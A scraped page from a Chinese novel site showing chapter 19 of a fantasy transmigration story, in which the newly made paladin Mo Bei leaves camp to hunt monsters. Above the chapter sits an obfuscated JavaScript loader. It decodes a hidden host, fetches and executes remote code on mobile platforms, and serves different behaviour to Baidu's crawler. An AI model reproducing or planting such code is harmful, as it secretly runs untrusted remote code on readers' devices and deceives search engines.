98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第19章 练手(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

直至回到旅馆房间内,莫北依旧感觉脚下轻飘飘的。呈大字型仰在床上,心中思绪万千,概括起来大概就是。。患得患失。

“这护符上的属性到底有没有效果,如果像游戏里那样的话小队成员是不共享护符效果的吧。。”

莫北也不知道该不该隐瞒这个护符的存在,就像他的穿越身份,每次和人说起他的来历就觉得很别扭。

但是他也担心暴露这个作弊神器会发生让他无法预知的事,这种对未知的恐惧大概是他这个孤独的穿越者最大的心理障碍。

莫北其实真的很怕自己会因为不断隐瞒各种事,而变得越来越孤独。孤独。。。是他最不愿承受的折磨。

在穿越前的家中,他没有将任何一件父母用过的东西收起。

爸爸喝水的杯子,每次擦完茶几他都会摆回原位。妈妈的梳妆台,他总是会耐着性子将每个瓶瓶罐罐上的灰尘擦去,摆好。

并非是要营造父母仍在的假象,这些只是他寄托思念的方式,以及他与孤独的抗争。房间里的一切,都是他对抗孤独的战友。

然而在这里,他只能孤军奋战。

莫北坐起来,努力地深呼吸。试图呼出内心的纷乱与压抑。

来到房间角落,将靠在墙角的皮甲穿上,拿起短剑收入物品栏,他决定出营地找点怪试试手,然后在天黑前回来。

莫北径直来到营地的北门,正是当初自己进来时的大门。接近城门时就有守卫向他询问。

“你是要单独出去吗?”

“是的!我是新转职的圣骑士,莫北。我想出去练练手。”莫北回答。

“你等一下!我去通知队长。”守卫转身上了哨塔。

不一会,卡尔从哨塔内走出。

“嗯?莫北?是你打算独自出营地。”

“嗯,是的,卡尔大。。哥。我今天刚转职了圣骑士。”

“我就知道!嗨!你们这些小家伙,一转职就迫不及待地要出去历练,毛毛躁躁的。就算要出去你好歹找个小队啊!”卡尔似乎没少遇到这种事。

“我就是在附近找点怪物练练手,我有经验的。我之前在荒野独自流浪了两天呢。而且我天黑前就回来!”莫北开始担心卡尔不放行,可对方毕竟也是担心自己的安全。

“哦。。。。啧。。。真是。着什么急。。年轻人就是。。”卡尔有点为难,但他想起自己当初可不也是这样,刚传承了几个技能就扛着木棒想出营地大杀四方,却在门口被自己的卫兵老爹摁在地上一顿爆锤。。。。

“那好吧,不过这附近你可能找不到什么怪。都让巡逻队清除了。你向东北方跑大约一个半小时,那片都是乱石的荒地。应该能找到一些怪的。我在这盯着,天黑前不回来,可别怪我收拾你!”给莫北指了方向,又警告了莫北两句,卡尔这才放莫北出了营地。

“一定回来一定回来!我可不想再外面过夜!谢谢卡尔大哥。”说着莫北一溜烟跑出营地,过了石桥,向着卡尔指的方向疾行。

三个月的训练让莫北的速度和耐力又了明显提升,在跑到那块乱石荒地时,莫北才微微有些气喘。

此时大约是正午。莫北感慨早起果然能多做很多事情。早上自己在房间里好一通打扮,又去修道院转了个职,跑到这里才中午。穿越前自己总在休息日睡到临近中午,然后就感觉一晃眼一天就过去了。

正想着,剑盾在手的莫北就看到远处石块间晃动的红点。

“真是冤家路窄,看我怎么报当日开裆之仇!”莫北提剑就冲了出去。

坚持贯彻“不能浪”思想方针的莫北一边跑一边四下观察,提防石块后突然窜出个硬皮老鼠什么的。

果不其然。奔跑的莫北感觉到一块大石后有东西晃动,定睛一看居然是一条大尾巴。

“哈哈!先把被偷袭的仇报了!”莫北蹑步上前。

躲在大石后那只硬皮老鼠的大屁股就在眼前,莫北一脸坏笑地举起手中短剑。心中默念:“千年。。。”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间